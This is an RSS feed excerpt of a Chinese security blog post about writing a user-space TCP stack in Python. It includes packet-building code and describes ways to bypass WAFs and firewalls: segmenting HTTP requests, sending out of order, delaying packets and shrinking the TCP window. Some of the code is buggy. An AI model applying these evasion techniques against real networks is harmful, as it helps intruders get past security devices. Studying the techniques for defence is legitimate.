      <pubDate>Wed, 18 May 2022 08:09:50 +0800</pubDate>
    </item>
    <item>
      <title>简易版TCP实现Http Chunk</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485681&amp;idx=1&amp;sn=eb967060d9dc6c89ca439f8361b41f7a</link>
      <description>实现简易版用户态TCP</description>
      <content:encoded><![CDATA[<p>
原创 <span>蛋黄</span> <span>2022-05-17 10:02</span> <span style="display: inline-block;">河北</span>
</p>

<p>实现简易版用户态TCP</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=fd3af7d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdFkdmB2OibnDibWBKgzXiaH2ml1Urkatt1WI2w4MenZ8J1bbTO3NAIk1JDIKsDsbTObDI5TW5QYhoDfA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;" data-mpa-powered-by="yiban.io"><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最近半年个人工作，生活变动比较大，所以不太活跃，目前正在调整中～<br/>为什么实现简易版用户态TCP：</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">为了给我的资产监控添加用户态tcp扫描功能，加快扫描速度，多快好省</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实现构造畸报文的方式绕过网络设备，满足一些奇怪的需求。tcp属于内核态，不会提供让我们胡作非为的功能。</section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">本篇文章主要分为如下几个部分：</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">tcp/ip数据包的构建</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实现tcp的基础以及http传输的原理</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">简单介绍种绕过姿势</section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">当然，目前工具暂时不开源，因为还没有完善，待后面完善后再开源。目的是可以无损代替python中的tcp模块</p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>构建tcp ip 数据包</span><span></span></h1><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>以太网帧</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">既然我们决定实现用户态的tcp，那么我们需要构造tcp/ip的数据包。关于如何使用libpcap发包，请参考上一篇文章。<br/>学过计算机网络的同学都知道，发送一段网络报文，首先是以太网首部，随后紧跟ip报文，再是tcp或者udp等运输层数据报文。最终才是数据，如图<br/><img class="rich_pages wxw-img" data-ratio="0.2822695035460993" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1410" src="https://wechat2rss.xlab.app/img-proxy/?k=7abcc2e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFkdmB2OibnDibWBKgzXiaH2mlnFG5fe8DfiaQpEIhtRuDrKY44hbZs4Ap4EWZVUiaf8wYFYqZWZMrG17w%2F640%3Fwx_fmt%3Dpng"/><br/>所以我们需要根据协议，从以太网帧开始构建数据报文。在这里需要使用python提供的struct模块，将python的数据类型转换为bytes数组。因为以太网帧并不需要校验和，所以构造相对简单。<br/>在这里我们并不需要考虑VLAN（虚拟局域网），因为在我们的运行环境中，交换机都配置为Access模式，很少有配置为Trunk或者Hybrid模式。当然，如果有其他特殊需求，例如跨VLAN等，可以考虑在构造以太网帧中添加vlan。</p><blockquote data-tool="mdnice编辑器" style="border-top: none;border-right: none;border-bottom: none;font-size: 0.9em;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">注意，以太网帧并不提供校验等功能。如果发包频率过快，会导致上层设备丢弃报文。在二十年前，icmp发送源抑制报文，但是现在该报文已被废除。所以masscan的发包速率不可过快。</p></blockquote><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">既然我们决定从数据链路层构建报文，我们也需要处理arp请求。我们在接收到arp请求后，假如请求的是我们自己的协议地址，那么我们需要构建arp相应。如果我们的用户态tcp程序的ip地址与系统配置的ip地址相同，那么可以忽略arp请求响应。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #61aeee;line-height: 26px;">@classmethod</span><br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">unpack</span><span style="line-height: 26px;">(cls, px)</span>:</span><br/>    point = <span style="color: #d19a66;line-height: 26px;">0</span><br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;"># 硬件地址类型，网络层协议类型，硬件地址长度，网络层协议地址长度</span><br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;"># 所以我们目前不支持ipv6</span><br/>    hadware_type, protocol_type, hardware_addr_len, protocol_addr_len = struct.unpack(<span style="color: #98c379;line-height: 26px;">&#34;!HHBB&#34;</span>, px[point:point + <span style="color: #d19a66;line-height: 26px;">6</span>])<br/>    point += <span style="color: #d19a66;line-height: 26px;">6</span><br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;"># ipv4 的arp请求</span><br/>    <span style="color: #c678dd;line-height: 26px;">if</span> protocol_type == Ether_Protocol.IPV4:<br/>        oper, = struct.unpack(<span style="color: #98c379;line-height: 26px;">&#34;!H&#34;</span>, px[point:point + <span style="color: #d19a66;line-height: 26px;">2</span>])<br/>        point += <span style="color: #d19a66;line-height: 26px;">2</span><br/>        <br/>        sender_mac_addr, = struct.unpack(<span style="color: #98c379;line-height: 26px;">f&#34;!<span style="color: #e06c75;line-height: 26px;">{hardware_addr_len}</span>s&#34;</span>, px[point:point + hardware_addr_len])<br/>        point += hardware_addr_len<br/>        sender_proto_addr, = struct.unpack(<span style="color: #98c379;line-height: 26px;">f&#34;!<span style="color: #e06c75;line-height: 26px;">{protocol_addr_len}</span>s&#34;</span>, px[point:point + protocol_addr_len])<br/>        point += protocol_addr_len<br/>        <br/>        target_mac_addr, = struct.unpack(<span style="color: #98c379;line-height: 26px;">f&#34;!<span style="color: #e06c75;line-height: 26px;">{hardware_addr_len}</span>s&#34;</span>, px[point:point + hardware_addr_len])<br/>        point += hardware_addr_len<br/>        target_proto_addr, = struct.unpack(<span style="color: #98c379;line-height: 26px;">f&#34;!<span style="color: #e06c75;line-height: 26px;">{protocol_addr_len}</span>s&#34;</span>, px[point:point + protocol_addr_len])<br/>            point += protocol_addr_len<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这时候有的同学会问，那岂不是我们只要接受到特定网卡mac地址的请求，我们也可以胡乱回应。理论上来讲是这样，但是要具体分析物理层。如果物理层是WLAN的话，AP是不会给你的网卡发送不属于你mac地址的数据报文。所以mac地址尽量不要乱改。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>ip数据包</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">ip数据包的格式如下</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">    <span style="color: #98c379;line-height: 26px;">&#34;&#34;&#34;<br/>    0                 1                   2                   3<br/>    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>    |Version|  IHL  |Type of Service|          Total Length         |<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>    |         Identification        |Flags|      Fragment Offset    |<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>    |  Time to Live |    Protocol   |         Header Checksum       |<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>    |                       Source Address                          |<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>    |                    Destination Address                        |<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>    |                    Options                    |    Padding    |<br/>    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br/>        IP报文格式<br/>        1. 4位IP-version 4位IP头长度 8位服务类型 16位报文总长度<br/>        2. 16位标识符 3位标记位 13位片偏移 暂时不关注此行<br/>        3. 8位TTL 8位协议 16位头部校验和<br/>        4. 32位源IP地址<br/>        5. 32位目的IP地址<br/>    &#34;&#34;&#34;</span><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在网络中，ip，tcp，udp的校验和计算公式都一致，代码如下。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">checksum</span><span style="line-height: 26px;">(self, raw_packet)</span>:</span><br/>        chksum = <span style="color: #d19a66;line-height: 26px;">0</span><br/>        <span style="color: #c678dd;line-height: 26px;">if</span> raw_packet%<span style="color: #d19a66;line-height: 26px;">2</span>:<br/>            <span style="color: #5c6370;font-style: italic;line-height: 26px;"># 说明长度是奇数，需要在末尾padding一个byte的0</span><br/>            raw_packet += <span style="color: #98c379;line-height: 26px;">b&#39;\x00&#39;</span><br/>        <span style="color: #c678dd;line-height: 26px;">for</span> i <span style="color: #c678dd;line-height: 26px;">in</span> range(<span style="color: #d19a66;line-height: 26px;">0</span>, len(raw_tcp), <span style="color: #d19a66;line-height: 26px;">2</span>):<br/>            chksum += int.from_bytes(raw_packet[i:i + <span style="color: #d19a66;line-height: 26px;">2</span>], <span style="color: #98c379;line-height: 26px;">&#34;big&#34;</span>, signed=<span style="color: #56b6c2;line-height: 26px;">False</span>)<br/>        chksum = (chksum &gt;&gt; <span style="color: #d19a66;line-height: 26px;">16</span>) + (chksum &amp; <span style="color: #d19a66;line-height: 26px;">0xffff</span>)<br/>        chksum = chksum + (chksum &gt;&gt; <span style="color: #d19a66;line-height: 26px;">16</span>)<br/>        <span style="color: #c678dd;line-height: 26px;">return</span> ~chksum &amp; <span style="color: #d19a66;line-height: 26px;">0xffff</span><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最终代码如下</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">pack</span><span style="line-height: 26px;">(self)</span>:</span><br/>        chksum = <span style="color: #d19a66;line-height: 26px;">0</span><br/>        raw = struct.pack(<span style="color: #98c379;line-height: 26px;">&#34;!BBHHH&#34;</span>, self.version &lt;&lt; <span style="color: #d19a66;line-height: 26px;">4</span> | self.ipv4_header, <span style="color: #d19a66;line-height: 26px;">0xc0</span>, self.tol, self.identification,<br/>                              self.flag &lt;&lt; <span style="color: #d19a66;line-height: 26px;">13</span> | self.offset)<br/>        raw += struct.pack(<span style="color: #98c379;line-height: 26px;">&#34;!BBHII&#34;</span>, self.ttl, self.protocol, chksum, ip2int(self.src_ip), ip2int(self.dst_ip))<br/>        chksum = self.checksum(raw)<br/>        raw = struct.pack(<span style="color: #98c379;line-height: 26px;">&#34;!BBHHH&#34;</span>, self.version &lt;&lt; <span style="color: #d19a66;line-height: 26px;">4</span> | self.ipv4_header, <span style="color: #d19a66;line-height: 26px;">0xc0</span>, self.tol, self.identification,<br/>                              self.flag &lt;&lt; <span style="color: #d19a66;line-height: 26px;">13</span> | self.offset)<br/>        raw += struct.pack(<span style="color: #98c379;line-height: 26px;">&#34;!BBHII&#34;</span>, self.ttl, self.protocol, chksum, ip2int(self.src_ip), ip2int(self.dst_ip))<br/>        <span style="color: #c678dd;line-height: 26px;">return</span> raw<br/></code></pre><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>tcp数据包</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">包结构如下<br/><img class="rich_pages wxw-img" data-ratio="0.7317073170731707" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="3075" src="https://wechat2rss.xlab.app/img-proxy/?k=a3e31300&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFkdmB2OibnDibWBKgzXiaH2mlWW7CekALVqXF0gOsWdQ09iavIibr4NTics2vDOpq5gfKJ5ItibXiaibibHGXA%2F640%3Fwx_fmt%3Dpng"/><br/>最终代码如下</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">pack</span><span style="line-height: 26px;">(self)</span>:</span><br/>        <span style="color: #98c379;line-height: 26px;">&#34;&#34;&#34;<br/>        打包tcp<br/>        :return:<br/>        &#34;&#34;&#34;</span><br/>        chksum = <span style="color: #d19a66;line-height: 26px;">0</span><br/>        raw_tcp = struct.pack(<span style="color: #98c379;line-height: 26px;">&#39;&gt;HHLLBBHHH&#39;</span>, self.src_port, self.dst_port, self.seq_num, self.ack_num, self.data_offset,<br/>                              self.flag, self.win_size, chksum, self.urg_pointer)<br/>        raw_tcp += self.data<br/>        chksum = self.chksum(raw_tcp)<br/>        <span style="color: #c678dd;line-height: 26px;">return</span> struct.pack(<span style="color: #98c379;line-height: 26px;">&#39;&gt;HHLLBBHHH&#39;</span>, self.src_port, self.dst_port, self.seq_num, self.ack_num, self.data_offset,<br/>                           self.flag, self.win_size, chksum, self.urg_pointer) + self.data<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">当然，如果想更详细地了解tcp的状态机，请参考Embedded Xinu操作系统的源码，该源码简单易懂，链接如下<br/><a href="https://github.com/xinu-os/xinu/blob/28a035ae86ba2cd38b7c07f4d35fe8115ad3078d/device/tcp/tcpRecv.c" target="_blank">https://github.com/xinu-os/xinu/blob/28a035ae86ba2cd38b7c07f4d35fe8115ad3078d/device/tcp/tcpRecv.c</a></p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>TCP 分包bypass</span><span></span></h1><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这里主要介绍一下seq与ack以及几种标志位。<br/>在建立好tcp连接后，我们就可以发送数据了。这时候标志位需要设置为ACK。seq序列号为上一次发送数据包的seq + 上次发送数据的长度。如下代码</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">tcp = TcpPkt(self.port_me, self.dst_port, self.seq_num, self.ack_num, TcpFlag.ACK)<br/>tcp.data = data<br/>self.eth_pkt.set_transport(tcp)<br/>rawsock_send_ipv4(pcap, self.eth_pkt.pack())<br/>self.seq_num += len(data)<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">对于http这种协议，首先发送http请求头，在请求头中注明请求体的长度，也就是content-length。发送完http请求头后，在最后一条tcp报文中需要设置tcp ACK和PSH。PSH标志位告诉上层应用可以接受消息了。<br/>当然对于http chunk这种编码另说。这时候上层应用再根据content-length标注的长度继续接收报文。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在接收到tcp的报文，需要回复ACK，当然这个ACK报文可以不需要携带数据。并且seq也不需要+1。ack的长度为接收到报文的seq与接收报文的数据长度。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDic3ricaZQNvZ9DLHbSufjPpIOwG4an65rFunPXlkGuPble1UTc7EZ3qz4wcwQfMb8iarjuOibpMgJiaD/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">elif</span> tcp_session.state == State.ESTABLISHED:<br/>    <span style="color: #c678dd;line-height: 26px;">if</span> recv_tcp.transport.data:<br/>        tcp_session.ack_num = recv_tcp.transport.seq_num + len(recv_tcp.transport.data)<br/>        tcp_session.data += recv_tcp.transport.data<br/>        tcp = TcpPkt(tcp_session.port_me, tcp_session.dst_port,<br/>                     tcp_session.seq_num, tcp_session.ack_num, TcpFlag.ACK)<br/>        tcp_session.eth_pkt.set_transport(tcp)<br/>        rawsock_send_ipv4(pcap, tcp_session.eth_pkt.pack())<br/>        <span style="color: #c678dd;line-height: 26px;">if</span> recv_tcp.transport.flag &amp; TcpFlag.PSH:<br/>            tcp_session.push = <span style="color: #56b6c2;line-height: 26px;">True</span><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">一般情况下，一条http请求或者http响应，都在一个包中。在上一节我们可知，每个包最大可以1420个字节。这足够容纳很多内容了。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这也就是为什么很多安全设备不愿重组包的原因</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">操作系统默认会将一次请求塞进一个tcp保重，这样安全设备只检查每一个包即可完成拦截任务。这样既节省了资源，又完成任务。这也就是http chunk可以绕过WAF的原因。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">在高速报文的请求中，防火墙很难追踪每一条tcp会话，硬件不允许。</section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">那么我们在发tcp包的时候，只需要控制每个包发送的长度，分多次发，最后一个数据包发送PSH&amp;ACK即可。最终实现截图<br/><img class="rich_pages wxw-img" data-ratio="0.16593647316538881" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1826" src="https://wechat2rss.xlab.app/img-proxy/?k=d099d5b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFkdmB2OibnDibWBKgzXiaH2mlibTkEmKms9GZIkvSaa4CTedM2jMYty65gMKs1aF6fflQrCZ7J1ySt3g%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这个时候我们再加入乱序发包的功能，延迟发包的功能，就可以更方便地绕过安全设备。安全设备即使重组tcp回话，假如每个包都延迟到达，这个延迟时间刚好处于安全设备重组TCP会话的等待延迟与系统重组的延迟时间之间，就可以达到绕过安全设备的目的。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这时我们已经达到发包实现分块传输，但是怎么让对方设备的回包也实现分块传输呢。这时候我们需要借助tcp的window滑动窗口机制。<br/>TCP使用“窗口”，意味着发送方发送一个或更多数据包，接收方就会响应一个或所有数据包。当接收方开始一个TCP连接时，自身会打开一个接收缓存区作为临时存储，之后再交给程序处理。<br/>当接收方发送一个ACK响应(即对收到数据的响应)时，接收方会告诉发送者下一次我能接收多少数据，我们管这个叫<strong>窗口大小</strong>(window size)<strong>。</strong>一般这个窗口大小就是接收方缓冲区的大小。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们只需要将tcp的window设置的足够小，就可以实现对端设备响应的分块，如图</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.7339449541284404" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="872" src="https://wechat2rss.xlab.app/img-proxy/?k=4b374a1a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFkdmB2OibnDibWBKgzXiaH2mlag6kqZSdX3CXcxJEzQjKJaFibCNibjT3V7vlsa9zhJS4sibECv4pMzkBg%2F640%3Fwx_fmt%3Dpng"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">image.png</figcaption></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">同样，我们可以启动延迟确认数据等构造畸形请求的方式以干扰安全设备重组tcp会话的功能。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>QNSM</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">QSNM是否进行流重组，以条件编译确定__QNSM_STREAM_REASSEMBLE，默认配置中是不进行TCP流重组的<br/>同一个流的TCP都会进行流重组，上下行都在一个缓存队列中，最大支持8个报文，且不考虑重叠部分<br/>重组方法基于 hashmap + 双向链表<br/>TCP流缓存删除方式：1. 老化 2. 无需进一步解析 3. 命中规则<br/>具体参考<br/><a href="https://zhuanlan.zhihu.com/p/393121010" target="_blank">https://zhuanlan.zhihu.com/p/393121010</a></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">当然绕过姿势还很多，只要我们实现了自己的用户态TCP，就可以胡作非为～</p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span></span></h1></section><p><br/></p>



<p><a href="2247485681">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7c609a54&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485681%26idx%3D1%26sn%3Deb967060d9dc6c89ca439f8361b41f7a%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 17 May 2022 10:02:00 +0800</pubDate>
    </item>
    <item>
      <title>活动 | SecIN两周年“趣玩派对” ，超多精彩等你来～</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485666&amp;idx=1&amp;sn=6dc6ff835100089e22afdbb05a1bccd2</link>
      <description>SecIN即将2岁啦！感谢师傅们一路以来的温暖陪伴～为了回馈师傅们对SecIN的支持与喜爱2周年我们准备了多</description>
      <content:encoded><![CDATA[<p>
<span>即将过生日的</span> <span>2022-04-15 11:27</span> <span style="display: inline-block;"></span>
</p>

<p>SecIN即将2岁啦！感谢师傅们一路以来的温暖陪伴～为了回馈师傅们对SecIN的支持与喜爱2周年我们准备了多</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=cddbf6da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FxkA3iaCzeYpqIoMf8KtJcpiaKjx1yNjGUakO69CHNDB0sJdLzzXCwZ8dxbXCtdWLWAGedN5TMicMw8jNZXAiczaU9g%2F0%3Fwx_fmt%3Djpeg"/>
</p>


